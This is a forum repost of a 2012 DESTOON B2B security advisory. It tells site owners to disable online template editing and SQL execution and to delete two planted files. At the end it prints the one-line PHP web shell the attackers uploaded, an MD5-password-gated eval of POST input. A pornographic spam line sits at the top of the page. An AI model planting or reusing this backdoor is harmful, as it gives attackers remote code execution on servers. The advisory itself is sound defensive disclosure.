永久黄网站色视频免费直播,yy6080三理论日本中文,亚洲无码免费在线观看视频,欧美日韩精品一区二区在线播放

Board logo

標題: DESTOON B2B緊急安全公告20121010 [打印本頁]
作者: andy15703166    時間: 2012-10-11 09:52     標題: DESTOON B2B緊急安全公告20121010

由于后臺模板管理權(quán)限過大存在安全隱患,可能導(dǎo)致部分用戶遭遇黑客攻擊,為了您的網(wǎng)站安全,請看到此公告之后立即做以下處理:

一、修改根目錄config.inc.php修改 $CFG['edittpl'] = '1'; 為 $CFG['edittpl'] = '0'; 禁用在線編輯模板功能,$CFG['executesql'] 也建議設(shè)置為 0 禁用后臺執(zhí)行SQL功能。3.0及以下版本用戶,請臨時刪除admin/template.inc.php以免遭遇攻擊。

二、檢查站點目錄是否存在file/swfupload/editor.php和company/link/link.php,如果存在,請立即刪除,注意file/swfupload/editor.inc.php為系統(tǒng)正常文件,請不要誤刪。

設(shè)置過偽靜態(tài)并且站點目錄權(quán)限設(shè)置嚴格的用戶不受此影響,請看到的用戶相互轉(zhuǎn)告,盡快處理。

提示:

系統(tǒng)需要設(shè)置可寫的目錄和文件詳見:http://help.destoon.com/install/68.html,其他文件和目錄請不要設(shè)置寫入權(quán)限。

利用Rewrite規(guī)則設(shè)置網(wǎng)站安全:http://help.destoon.com/skill/71.html

PS:
黑客上傳文件file/swfupload/editor.php 和 link.php文件源碼:
  1. <?php if(md5($_GET['pass'])=='cfb83d29df045615c7d99d33110ef683'){eval($_POST[console]);}else{die('fuck off!');}?>
復(fù)制代碼





歡迎光臨 WDlinux官方論壇 (http://www.fsowen.com/bbs/) Powered by Discuz! 7.2